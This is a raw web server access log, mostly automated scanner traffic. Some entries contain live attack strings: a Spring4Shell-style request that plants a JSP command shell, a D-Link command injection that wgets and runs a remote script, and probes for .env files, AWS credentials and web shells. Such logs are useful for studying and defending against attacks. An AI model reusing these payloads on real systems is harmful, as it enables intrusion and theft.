34.140.248.32 - - [27/Aug/2023:02:24:18 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.31.0"
167.94.138.124 - - [27/Aug/2023:03:50:39 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
167.94.138.124 - - [27/Aug/2023:03:50:39 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.124 - - [27/Aug/2023:03:50:39 +0200] "PRI * HTTP/2.0" 400 383 "-" "-"
167.94.138.124 - - [27/Aug/2023:03:50:39 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.124 - - [27/Aug/2023:03:50:39 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
172.104.210.105 - - [27/Aug/2023:05:25:14 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
172.105.128.12 - - [27/Aug/2023:05:25:56 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
138.68.208.46 - - [27/Aug/2023:05:33:29 +0200] "MGLNDD_212.69.160.11_80" 400 383 "-" "-"
37.139.129.60 - - [27/Aug/2023:05:51:52 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
37.139.129.60 - - [27/Aug/2023:05:51:52 +0200] "POST / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
66.175.213.4 - - [27/Aug/2023:05:58:37 +0200] "\x16\x03\x01" 400 383 "-" "-"
43.134.108.109 - - [27/Aug/2023:05:59:01 +0200] "GET / HTTP/1.1" 200 274 "-" "'Mozilla/5.0"
43.134.108.109 - - [27/Aug/2023:05:59:02 +0200] "\x16\x03\x01" 400 383 "-" "-"
43.134.108.109 - - [27/Aug/2023:05:59:02 +0200] "GET /jquery-3.3.1.min.js HTTP/1.1" 404 291 "http://code.jquery.com/" "'Mozilla/5.0"
43.134.108.109 - - [27/Aug/2023:05:59:03 +0200] "POST /nation.php HTTP/1.1" 404 284 "-" "Mozilla_33741328"
43.134.108.109 - - [27/Aug/2023:05:59:04 +0200] "GET /is-bin HTTP/1.1" 404 281 "-" "'Mozilla/5.0"
43.134.108.109 - - [27/Aug/2023:05:59:04 +0200] "GET /is-bin HTTP/1.1" 404 281 "-" "'Mozilla/5.0"
43.134.108.109 - - [27/Aug/2023:05:59:05 +0200] "GET /news.php HTTP/1.1" 404 282 "-" "'Mozilla/5.0"
43.134.108.109 - - [27/Aug/2023:05:59:06 +0200] "GET /load HTTP/1.1" 404 280 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727)"
43.134.108.109 - - [27/Aug/2023:05:59:07 +0200] "GET /8.bin HTTP/1.1" 404 281 "-" "'Mozilla/5.0"
43.134.108.109 - - [27/Aug/2023:05:59:07 +0200] "GET /hrsgdsb7386wknzms.jpg HTTP/1.1" 404 296 "-" "'Mozilla/5.0"
43.134.108.109 - - [27/Aug/2023:05:59:08 +0200] "GET /UnityPlayer.dll HTTP/1.1" 404 287 "-" "'Mozilla/5.0"
43.134.108.109 - - [27/Aug/2023:05:59:09 +0200] "GET /ttd.exe HTTP/1.1" 404 282 "-" "'Mozilla/5.0"
43.134.108.109 - - [27/Aug/2023:05:59:09 +0200] "GET /qd.CHM HTTP/1.1" 404 282 "-" "'Mozilla/5.0"
43.134.108.109 - - [27/Aug/2023:05:59:10 +0200] "GET /zMLUH93A HTTP/1.1" 404 285 "-" "'Mozilla/5.0"
43.134.108.109 - - [27/Aug/2023:05:59:11 +0200] "GET /Display/chan/IB61I7MYA HTTP/1.1" 404 367 "-" "'Mozilla/5.0"
43.134.108.109 - - [27/Aug/2023:05:59:12 +0200] "GET /jquery-3.3.1.min.js HTTP/1.1" 404 291 "-" "'Mozilla/5.0"
43.134.108.109 - - [27/Aug/2023:05:59:12 +0200] "GET /Gmail/UnityPlayer.txt HTTP/1.1" 404 292 "-" "'Mozilla/5.0"
43.134.108.109 - - [27/Aug/2023:05:59:13 +0200] "GET /new/login HTTP/1.1" 404 284 "-" "'Mozilla/5.0"
43.134.108.109 - - [27/Aug/2023:05:59:14 +0200] "GET /viwwwsogou?op=8&query=%E7%A8%8F%E5%BB%BA%09%E9%BE%90%E1%B7%A2 HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko"
43.134.108.109 - - [27/Aug/2023:05:59:14 +0200] "GET /e3e7e71a0b28b5e96cc492e636722f73/4sVKAOvu3D/BDyot0NxyG.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101"
43.134.108.109 - - [27/Aug/2023:05:59:15 +0200] "GET /jquery.js HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36"
43.134.108.109 - - [27/Aug/2023:05:59:16 +0200] "GET /wh/glass.php HTTP/1.1" 404 286 "-" "'Mozilla/5.0"
43.134.108.109 - - [27/Aug/2023:05:59:16 +0200] "GET /login HTTP/1.1" 404 281 "-" "'Mozilla/5.0"
43.134.108.109 - - [27/Aug/2023:05:59:17 +0200] "GET /c/msdownload/update/software/update/2021/11/6632de33-967441-x86.cab HTTP/1.1" 404 326 "-" "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.31"
43.134.108.109 - - [27/Aug/2023:05:59:18 +0200] "GET /c/msdownload/update/software/update/2021/11/6632de33-967441-x86.cab HTTP/1.1" 404 326 "-" "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.31"
43.134.108.109 - - [27/Aug/2023:05:59:18 +0200] "GET /fw6I HTTP/1.1" 404 281 "-" "'Mozilla/5.0"
43.134.108.109 - - [27/Aug/2023:05:59:19 +0200] "GET /fw6I HTTP/1.1" 404 281 "-" "'Mozilla/5.0"
43.134.108.109 - - [27/Aug/2023:05:59:20 +0200] "GET /ckCK HTTP/1.1" 404 281 "-" "'Mozilla/5.0"
43.134.108.109 - - [27/Aug/2023:05:59:21 +0200] "GET /UV9x HTTP/1.1" 404 281 "-" "'Mozilla/5.0"
43.134.108.109 - - [27/Aug/2023:05:59:21 +0200] "GET /Visu/ens/events HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
43.134.108.109 - - [27/Aug/2023:05:59:22 +0200] "GET /Visu/ens/events HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
159.203.140.213 - - [27/Aug/2023:05:59:27 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.89.90.137 - - [27/Aug/2023:06:33:01 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
179.43.191.194 - - [27/Aug/2023:06:48:20 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 293 "http://212.69.160.11:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
179.43.191.194 - - [27/Aug/2023:08:02:44 +0200] "GET / HTTP/1.1" 200 423 "-" "Hello World"
137.184.68.173 - - [27/Aug/2023:08:11:18 +0200] "GET /repeater.php HTTP/1.1" 404 288 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
137.184.68.173 - - [27/Aug/2023:08:11:23 +0200] "GET /wp-admin/network/xmrlpc.php HTTP/1.1" 404 301 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
137.184.68.173 - - [27/Aug/2023:08:11:25 +0200] "GET /.well-known/acme-challenge/xmrlpc.php HTTP/1.1" 404 307 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
137.184.68.173 - - [27/Aug/2023:08:11:27 +0200] "GET /wp-includes/js/tinymce/plugins/compat3x/css/index.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
137.184.68.173 - - [27/Aug/2023:08:11:29 +0200] "GET /wp-content/updates.php HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
137.184.68.173 - - [27/Aug/2023:08:11:31 +0200] "GET /wp-admin/css/colors/coffee/index.php HTTP/1.1" 404 305 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
137.184.68.173 - - [27/Aug/2023:08:11:34 +0200] "GET /wp-includes/sodium_compat/src/Core/Curve25519/Ge/wp_blog.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
137.184.68.173 - - [27/Aug/2023:08:11:36 +0200] "GET /wso112233.php HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
137.184.68.173 - - [27/Aug/2023:08:11:38 +0200] "GET /shell20211028.php HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
137.184.68.173 - - [27/Aug/2023:08:11:40 +0200] "GET /wp-content/plugins/xwp/up.php HTTP/1.1" 404 302 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
137.184.68.173 - - [27/Aug/2023:08:11:44 +0200] "GET /wp-content/plugins/wordpresss3cll/up.php HTTP/1.1" 404 308 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
137.184.68.173 - - [27/Aug/2023:08:11:47 +0200] "GET /wp-content/plugins/ccx/index.php HTTP/1.1" 404 304 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
137.184.68.173 - - [27/Aug/2023:08:11:49 +0200] "GET /wp-content/plugins/anttt/simple.php HTTP/1.1" 404 305 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
137.184.68.173 - - [27/Aug/2023:08:11:52 +0200] "GET /wp-content/plugins/TOPXOH/wDR.php HTTP/1.1" 404 306 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
137.184.68.173 - - [27/Aug/2023:08:11:54 +0200] "GET /wp-content/plugins/wp-file-upload/ROOBOTS.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
137.184.68.173 - - [27/Aug/2023:08:11:56 +0200] "GET /bala.php HTTP/1.1" 404 286 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
137.184.68.173 - - [27/Aug/2023:08:11:58 +0200] "GET /wp-content/plugins/sid/sidwso.php HTTP/1.1" 404 302 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
137.184.68.173 - - [27/Aug/2023:08:12:00 +0200] "GET /wp-includes/wp-class.php HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
137.184.68.173 - - [27/Aug/2023:08:12:03 +0200] "GET /wp-content/index.php HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
137.184.68.173 - - [27/Aug/2023:08:12:07 +0200] "GET /wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
137.184.68.173 - - [27/Aug/2023:08:12:10 +0200] "GET /wp-includes/js/tinymce/skins/lightgray/img/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
137.184.68.173 - - [27/Aug/2023:08:12:13 +0200] "GET /cjfuns.php HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
205.210.31.243 - - [27/Aug/2023:09:21:34 +0200] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
179.43.191.162 - - [27/Aug/2023:09:50:13 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
179.43.191.162 - - [27/Aug/2023:09:50:13 +0200] "GET /info.php HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
179.43.191.162 - - [27/Aug/2023:09:50:13 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
179.43.191.162 - - [27/Aug/2023:09:50:13 +0200] "GET /env.js HTTP/1.1" 404 282 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
179.43.191.162 - - [27/Aug/2023:09:50:13 +0200] "GET /.env.example HTTP/1.1" 404 286 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
179.43.191.162 - - [27/Aug/2023:09:50:13 +0200] "GET /.env.production HTTP/1.1" 404 287 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
179.43.191.162 - - [27/Aug/2023:09:50:13 +0200] "GET /.env.prod HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
179.43.191.162 - - [27/Aug/2023:09:50:13 +0200] "GET /.env/backup HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
179.43.191.162 - - [27/Aug/2023:09:50:13 +0200] "GET //api/.env HTTP/1.1" 404 282 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
179.43.191.162 - - [27/Aug/2023:09:50:14 +0200] "GET /.s3cfg HTTP/1.1" 404 282 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
179.43.191.162 - - [27/Aug/2023:09:50:14 +0200] "GET /app/.env HTTP/1.1" 404 282 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
179.43.191.162 - - [27/Aug/2023:09:50:14 +0200] "GET /laravel/.env HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
179.43.191.162 - - [27/Aug/2023:09:50:14 +0200] "GET /backend/.env HTTP/1.1" 404 286 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
179.43.191.162 - - [27/Aug/2023:09:50:14 +0200] "GET /admin/.env HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
179.43.191.162 - - [27/Aug/2023:09:50:14 +0200] "GET /prod/.env HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
179.43.191.162 - - [27/Aug/2023:09:50:14 +0200] "GET /.env.save HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
179.43.191.162 - - [27/Aug/2023:09:50:14 +0200] "GET /.env.bak HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
179.43.191.162 - - [27/Aug/2023:09:50:14 +0200] "GET /web/.env HTTP/1.1" 404 282 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
179.43.191.162 - - [27/Aug/2023:09:50:14 +0200] "GET /crm/.env HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
179.43.191.162 - - [27/Aug/2023:09:50:14 +0200] "GET /local/.env HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
179.43.191.162 - - [27/Aug/2023:09:50:14 +0200] "GET /application/.env HTTP/1.1" 404 288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
179.43.191.162 - - [27/Aug/2023:09:50:14 +0200] "GET /.aws/credentials HTTP/1.1" 404 287 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
179.43.191.162 - - [27/Aug/2023:09:50:14 +0200] "GET /.aws/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
179.43.191.162 - - [27/Aug/2023:09:50:14 +0200] "GET /app/config/parameters.yml HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
179.43.191.162 - - [27/Aug/2023:09:50:14 +0200] "GET /config.js HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
179.43.191.162 - - [27/Aug/2023:09:50:14 +0200] "GET /?phpinfo=1 HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
179.43.191.162 - - [27/Aug/2023:09:50:15 +0200] "GET /infophp.php HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
179.43.191.162 - - [27/Aug/2023:09:50:15 +0200] "GET /dashboard/phpinfo.php HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
179.43.191.162 - - [27/Aug/2023:09:50:15 +0200] "GET /config/default.json HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
179.43.191.162 - - [27/Aug/2023:09:50:15 +0200] "GET /.hg HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
179.43.191.162 - - [27/Aug/2023:09:50:15 +0200] "GET /.svn HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
87.236.176.221 - - [27/Aug/2023:09:58:21 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
94.102.61.10 - - [27/Aug/2023:10:05:12 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "python-requests/2.26.0"
94.102.61.10 - - [27/Aug/2023:10:05:12 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.26.0"
185.207.250.115 - - [27/Aug/2023:10:27:23 +0200] "POST /actuator/gateway/routes/AzMtdFlkrml HTTP/1.1" 404 380 "-" "Custom-HttpClient"
185.207.250.115 - - [27/Aug/2023:10:27:24 +0200] "GET /functionRouter/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1" 404 360 "-" "Custom-HttpClient"
65.49.1.64 - - [27/Aug/2023:10:32:37 +0200] "\x16\x03\x01" 400 383 "-" "-"
88.28.200.9 - - [27/Aug/2023:10:35:18 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.76.51.50/dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0"
176.97.210.61 - - [27/Aug/2023:10:54:31 +0200] "GET / HTTP/1.1" 200 423 "-" "Hello World"
178.62.217.181 - - [27/Aug/2023:11:12:34 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
170.106.173.40 - - [27/Aug/2023:11:54:23 +0200] "GET / HTTP/1.1" 200 423 "-" "curl/7.64.1"
36.99.136.136 - - [27/Aug/2023:11:54:39 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
36.99.136.137 - - [27/Aug/2023:11:54:39 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
36.99.136.137 - - [27/Aug/2023:11:54:40 +0200] "GET /layout.php HTTP/1.1" 200 816 "http://212.69.160.11/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.129 - - [27/Aug/2023:11:54:41 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
36.99.136.137 - - [27/Aug/2023:11:54:41 +0200] "GET /gui/javascript/form_form.js HTTP/1.1" 200 16206 "http://212.69.160.11/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.129 - - [27/Aug/2023:11:54:41 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
36.99.136.136 - - [27/Aug/2023:11:54:41 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
36.99.136.137 - - [27/Aug/2023:11:54:45 +0200] "GET /entry.php?id=10273 HTTP/1.1" 200 1903 "http://212.69.160.11/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.136 - - [27/Aug/2023:11:54:45 +0200] "GET /entry.php?id=10270 HTTP/1.1" 200 908 "http://212.69.160.11/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.137 - - [27/Aug/2023:11:54:45 +0200] "GET /entry.php?id=11412 HTTP/1.1" 200 1759 "http://212.69.160.11/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.128 - - [27/Aug/2023:11:54:46 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
36.99.136.137 - - [27/Aug/2023:11:54:46 +0200] "GET /entry.php?id=10272 HTTP/1.1" 200 1159 "http://212.69.160.11/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.136 - - [27/Aug/2023:11:54:46 +0200] "GET /gui/javascript/jquery/css/gui-themes/custom.min.css HTTP/1.1" 200 5618 "http://212.69.160.11/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.136 - - [27/Aug/2023:11:54:46 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
36.99.136.136 - - [27/Aug/2023:11:54:47 +0200] "GET /gui/javascript/jquery/css/gui-themes/ui.spinner.css HTTP/1.1" 200 350 "http://212.69.160.11/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.128 - - [27/Aug/2023:11:54:47 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
36.99.136.137 - - [27/Aug/2023:11:54:47 +0200] "GET /gui/javascript/jquery/css/gui-themes/jquery.tooltip.css HTTP/1.1" 200 246 "http://212.69.160.11/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.136 - - [27/Aug/2023:11:54:49 +0200] "GET /gui/styles/tmplDefault.css HTTP/1.1" 200 2135 "http://212.69.160.11/entry.php?id=11412" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.137 - - [27/Aug/2023:11:54:49 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
36.99.136.137 - - [27/Aug/2023:11:54:49 +0200] "GET /gui/javascript/form_form.js?1693130085 HTTP/1.1" 200 16206 "http://212.69.160.11/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.137 - - [27/Aug/2023:11:54:50 +0200] "GET /framework/webfx/style/toolbar/cb2.css HTTP/1.1" 200 793 "http://212.69.160.11/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.136 - - [27/Aug/2023:11:54:50 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
36.99.136.136 - - [27/Aug/2023:11:54:50 +0200] "GET /gui/javascript/jquery/js/jquery-1.8.2.js HTTP/1.1" 200 35391 "http://212.69.160.11/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
